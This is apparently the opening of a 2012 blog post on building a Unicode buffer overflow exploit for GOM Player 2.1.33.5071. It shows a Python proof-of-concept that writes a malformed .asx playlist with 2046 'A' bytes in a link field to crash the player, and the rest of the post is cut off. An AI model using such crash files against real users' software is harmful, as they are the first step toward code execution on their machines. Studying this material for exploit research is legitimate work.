Landing in an unicode application

KUMΞL | Friday, April 27, 2012 | | 5 comments


After several time reading an article about unicode in corelan.be, now let me try how to do that with my own knowledge. Here i'm using the application GOM Player 2.1.33.5071, as we knew if it already exploited several months ago and we will find the exploit of it here, so i'm using the proof of concept how to crashing the application to explain how to build an exploit in it (unicode application).

Here is the POC :
#!/usr/bin/python
header = '<asx version = "3.0" ><entry><title>Download</title><ref href = "WWW.'
junk = "\x41" * 2046
footer = '"/></entry></asx>'

payload = junk

f = open('fuzzer.asx','w')
f.write(header+payload+footer)
f.close()

Read more »
Subscribe to: Posts (Atom)